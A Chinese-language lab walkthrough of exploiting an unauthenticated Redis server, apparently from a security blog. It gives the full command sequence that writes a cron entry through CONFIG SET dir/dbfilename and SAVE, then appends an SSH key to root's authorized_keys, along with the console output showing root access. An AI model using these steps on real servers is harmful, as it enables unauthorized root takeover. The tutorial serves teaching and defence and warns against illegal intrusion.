知识铺垫
Redis 还有几个奇怪的功能:Linux 有一个功能可以通过一个端口写到本地文件,如果我要写一个文件,而这个文件是木马,那就自动拉起了。如果写入自己签名的公钥,用自己的私钥解公钥,自己解自己的,所以直接替换公钥,就是通过 Redis。
那么下面来实战演练一下通过redis匿名登陆写入反弹shell
环境准备
首先启动一个允许匿名登陆的redis服务器。
[root@server01 src]# ./redis-server &
[1] 11173
[root@server01 src]# 11173:C 06 Dec 2018 00:22:43.058 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
11173:C 06 Dec 2018 00:22:43.058 # Redis version=5.0.2, bits=64, commit=00000000, modified=0, pid=11173, just started
11173:C 06 Dec 2018 00:22:43.058 # Warning: no config file specified, using the default config. In order to specify a config file use ./redis-server /path/to/redis.conf
11173:M 06 Dec 2018 00:22:43.058 * Increased maximum number of open files to 10032 (it was originally set to 1024).
_._
_.-``__ ''-._
_.-`` `. `_. ''-._ Redis 5.0.2 (00000000/0) 64 bit
.-`` .-```. ```\/ _.,_ ''-._
( ' , .-` | `, ) Running in standalone mode
|`-._`-...-` __...-.``-._|'` _.-'| Port: 6379
| `-._ `._ / _.-' | PID: 11173
`-._ `-._ `-./ _.-' _.-'
|`-._`-._ `-.__.-' _.-'_.-'|
| `-._`-._ _.-'_.-' | http://redis.io
`-._ `-._`-.__.-'_.-' _.-'
|`-._`-._ `-.__.-' _.-'_.-'|
| `-._`-._ _.-'_.-' |
`-._ `-._`-.__.-'_.-' _.-'
`-._ `-.__.-' _.-'
`-._ _.-'
`-.__.-'
11173:M 06 Dec 2018 00:22:43.058 # WARNING: The TCP backlog setting of 511 cannot be enforced because /proc/sys/net/core/somaxconn is set to the lower value of 128.
11173:M 06 Dec 2018 00:22:43.058 # Server initialized
11173:M 06 Dec 2018 00:22:43.058 # WARNING overcommit_memory is set to 0! Background save may fail under low memory condition. To fix this issue add 'vm.overcommit_memory = 1' to /etc/sysctl.conf and then reboot or run the command 'sysctl vm.overcommit_memory=1' for this to take effect.
11173:M 06 Dec 2018 00:22:43.058 # WARNING you have Transparent Huge Pages (THP) support enabled in your kernel. This will create latency and memory usage issues with Redis. To fix this issue run the command 'echo never > /sys/kernel/mm/transparent_hugepage/enabled' as root, and add it to your /etc/rc.local in order to retain the setting after a reboot. Redis must be restarted after THP is disabled.
11173:M 06 Dec 2018 00:22:43.058 * DB loaded from disk: 0.000 seconds
11173:M 06 Dec 2018 00:22:43.058 * Ready to accept connections
[root@server01 src]#
[root@server01 src]# ps -ef | grep redis
root 11173 1217 0 00:22 pts/0 00:00:00 ./redis-server *:6379
root 11178 1217 0 00:22 pts/0 00:00:00 grep --color=auto redis
[root@server01 src]#
假设通过端口扫描服务器存在6379的端口号,那么就可以尝试远程来访问一下这台redis服务器。
远程匿名访问redis服务
[root@server01 src]# redis-cli -h 192.168.116.128 -p 6379
192.168.116.128:6379> set 0 "\n\n*/1 * * * * echo yestest > /home/test.txt\n\n"
(error) DENIED Redis is running in protected mode because protected mode is enabled, no bind address was specified, no authentication password is requested to clients. In this mode connections are only accepted from the loopback interface. If you want to connect from external computers to Redis you may adopt one of the following solutions: 1) Just disable protected mode sending the command 'CONFIG SET protected-mode no' from the loopback interface by connecting to Redis from the same host the server is running, however MAKE SURE Redis is not publicly accessible from internet if you do so. Use CONFIG REWRITE to make this change permanent. 2) Alternatively you can just disable the protected mode by editing the Redis configuration file, and setting the protected mode option to 'no', and then restarting the server. 3) If you started the server manually just for testing, restart it with the '--protected-mode no' option. 4) Setup a bind address or an authentication password. NOTE: You only need to do one of the above things in order for the server to start accepting connections from the outside.
192.168.116.128:6379>
那么下面再把这个保护模式关闭一下,继续实战测试一下。
关闭redis服务的保护模式
[root@server01 redis-stable]# vim redis.conf
protected-mode no
重启redis服务:
[root@server01 redis-stable]# cd src/
[root@server01 src]# ./redis-server ../redis.conf
11213:C 06 Dec 2018 00:35:07.781 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
11213:C 06 Dec 2018 00:35:07.781 # Redis version=5.0.2, bits=64, commit=00000000, modified=0, pid=11213, just started
11213:C 06 Dec 2018 00:35:07.781 # Configuration loaded
[root@server01 src]#
再次入侵测试
[root@server01 src]# redis-cli -h 192.168.116.128 -p 6379
192.168.116.128:6379> set 0 "\n\n*/1 * * * * echo yestest > /home/test.txt\n\n"
OK
192.168.116.128:6379> config set dir /var/spool/cron/
OK
192.168.116.128:6379>
192.168.116.128:6379> config set dbfilename root
OK
192.168.116.128:6379> save
OK
192.168.116.128:6379>
执行完毕之后,我们来看看服务器是不是写入了crontab定时脚本。
查看是否成功写入定时脚本
[root@server01 home]# cd /var/spool/cron/
[root@server01 cron]# ls
[root@server01 cron]#
[root@server01 cron]# crontabs
-bash: crontabs: command not found
[root@server01 cron]# ls
root
[root@server01 cron]# crontab -l
REDIS0009 redis-ver5.0.2
redis-bits????e:?used-mem¨
aof-preamble~
*/1 * * * * echo yestest > /home/test.txt
?L?[root@server01 cron]#
查看是否正常执行:
好了,这里已经写入了一个定时执行的脚本,完全可以写成一个shell进行执行。
那么下一步,入侵写入一个公钥,然后尝试能够使用公钥访问该台服务器。
入侵写入公钥,进行root提权
首先创建公钥文件目录
[root@server01 src]# redis-cli -h 192.168.116.128 -p 6379
192.168.116.128:6379> set 0 "\n\n*/1 * * * * mkdir -p /root/.ssh \n\n"
OK
192.168.116.128:6379> config set dir /var/spool/cron/
OK
192.168.116.128:6379> config set dbfilename root
OK
192.168.116.128:6379> save
OK
192.168.116.128:6379>
写入公钥文件
192.168.116.128:6379> set 0 "\n\n*/1 * * * * echo 'ssh-rsa AAAAB3NzaC1yc2EAA...省略...3JjU=' >> /root/.ssh/authorized_keys \n\n"
OK
192.168.116.128:6379> config set dir /var/spool/cron/
OK
192.168.116.128:6379> config set dbfilename root
OK
192.168.116.128:6379> save
OK
192.168.116.128:6379>
查看执行情况:
尝试公钥登陆
已经成功登陆服务器的root权限。
安全系列的演练是为了提醒更好的预防,切忌进行非法入侵。
关注微信公众号,回复【资料】、Python、PHP、JAVA、web,则可获得Python、PHP、JAVA、前端等视频资料。
